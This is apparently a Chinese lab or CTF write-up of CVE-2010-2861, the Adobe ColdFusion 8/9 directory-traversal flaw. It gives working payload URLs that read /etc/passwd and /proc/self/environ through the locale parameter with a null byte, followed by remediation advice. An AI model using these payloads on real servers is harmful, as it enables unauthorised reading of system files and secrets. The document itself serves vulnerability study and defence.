CVE-2010-2861：Adobe ColdFusion 文件读取漏

产品简介

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

漏洞概述

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

影响范围

Adobe ColdFusion 8、9

利用流程

poc
http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

获取flag

http://123.58.236.76:54623/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../proc/self/environ%00en 

修复方案

配置文件：在配置文件中限制访问的文件目录，比如 PHP 中 php.ini 配置 open_basedir
特殊字符过滤：检查用户输入，过滤或转义含有“…/”、“…\”、“%00”，“…”，“./”，“#”等跳转目录或字符终止符、截断字符的输入
合法性判断：严格过滤用户输入字符的合法性，比如文件类型、文件地址、文件内容等
白名单：白名单限定访问文件的路径、名称及后缀名